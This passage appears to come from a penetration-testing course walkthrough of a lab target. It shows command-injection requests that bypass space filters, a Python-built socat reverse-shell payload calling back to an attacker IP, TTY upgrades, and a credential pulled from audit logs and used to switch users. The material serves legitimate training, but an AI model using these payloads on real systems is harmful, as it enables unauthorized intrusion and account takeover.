network that was part of the initial scope. If we can gain stable access to this host, we may be able to pivot into the internal network and start attacking the Active Directory domain.
Our next challenge is finding a way to a reverse shell. We can run single commands, but anything with a space does not work. Back to the Bypassing Space Filters section of the Command Injections
module, we remember that we can use the ($IFS) Linux Environment Variable
to bypass space restrictions. We can combine this with the new-line character bypass and start enumerating ways to obtain a reverse shell. To aid us, let's take a look at the ping.php
file to get an understanding of what is being filtered so we can limit the amount of guesswork needed.
Switching back to Burp and making the request GET /ping.php?ip=127.0.0.1%0a'c'at${IFS}ping.php
, or similar, gives us the file contents, and we can work on beating the filter and finding a way to establish a reverse shell.
We can see that the majority of options for getting a reverse shell are filtered, which will make things difficult; however, one that is not is socat. Socat is a versatile tool that can be used for catching shells and even pivoting, as we have seen in the Pivoting, Tunneling, and Port Forwarding module. Let's check and see if it's available to us on the system. Heading back to Burp and using the request GET /ping.php?ip=127.0.0.1%0a'w'h'i'ch${IFS}socat
shows us that it is on the system, located at /usr/bin/socat
.
Next Steps
Now that we've finally worked our way through all of the externally-facing services and web applications, we have a good idea as to our next steps. In the next section, we will work on establishing a reverse shell into the internal environment and escalating our privileges to establish some sort of persistence on the target host.
Initial Access
Now that we've thoroughly enumerated and attacked the external perimeter and uncovered a wealth of findings, we're ready to shift gears and focus on obtaining stable internal network access. Per the SoW document, if we can achieve an internal foothold, the client would like us to see how far we can go up to and including gaining Domain Admin level access
. In the last section, we worked hard on peeling apart the layers and finding web apps that led to early file read or remote code execution but didn't get us into the internal network. We left off with obtaining RCE on the monitoring.inlanefreight.local
application after a hard-fought battle against filters and blacklists set in place to try to prevent Command Injection
attacks.
Getting a Reverse Shell
As mentioned in the previous section, we can use Socat to establish a reverse shell connection. Our base command will be as follows, but we'll need to tweak it some to get past the filtering:
We can modify this command into a payload that gets past the filters and sends us a reverse shell.
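Assembling the final request means applying both bypasses to the socat command: replace every space with ${IFS} and prepend the URL-encoded newline as the injection operator. The attacker IP/port and the exact socat arguments below are assumptions for illustration.

```python
from urllib.parse import quote

# Sketch: combining the bypasses (newline as injection operator, ${IFS}
# instead of spaces) into one injected reverse-shell payload. The attacker
# IP/port and the exact socat arguments are assumptions here.
base = "socat TCP4:10.10.14.5:8443 EXEC:bash"

cmd = base.replace(" ", "${IFS}")   # no literal spaces survive
payload = "127.0.0.1\n" + cmd       # newline (%0a) chains our command

print("GET /ping.php?ip=" + quote(payload, safe=""))
```

If the second filter also matched on the tool name, the quote-splitting trick (e.g. `'s'ocat`) could be layered on top in the same way.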
Start a Netcat
listener on the port used in the Socat command (8443 here) and execute the above request in Burp Repeater. If all goes as intended, we will have a reverse shell as the webdev
user.
Next, we'll need to upgrade to an interactive TTY
. This post describes a few methods. We could use a method that was also covered in the Types of Shells section of the Getting Started
module, executing the well-known Python one-liner (python3 -c 'import pty; pty.spawn("/bin/bash")'
) to spawn a pseudo-terminal. But we're going to try something a bit different using Socat
. The reason for doing this is to get a proper terminal so we can run commands like su, sudo, and ssh, use command completion, and open a text editor if needed.
We'll start a Socat listener on our attack host.
Next, we'll execute a Socat one-liner on the target host.
If all goes as planned, we'll have a stable reverse shell connection on our Socat listener.
Now that we've got a stable reverse shell, we can start digging around the file system. The results of the id
command are immediately interesting. The Privileged Groups section of the Linux Privilege Escalation
module shows an example of users in the adm
group having rights to read ALL logs stored in /var/log
. Perhaps we can find something interesting there. We can use aureport to read audit logs on Linux systems, with the man page describing it as "aureport is a tool that produces summary reports of the audit system logs."
After running the command, type q
to return to our shell. From the above output, it looks like a user was trying to authenticate as the srvadm
user, and we have a potential credential pair srvadm:ILFreightnixadm!
. Using the su
command, we can authenticate as the srvadm
user.
Now that we've bypassed heavy filtering to achieve command injection, turned that code execution into a reverse shell, and escalated our privileges to another user, we don't want to lose access to this host. In the next section, we'll work towards achieving persistence, ideally after escalating privileges to root
.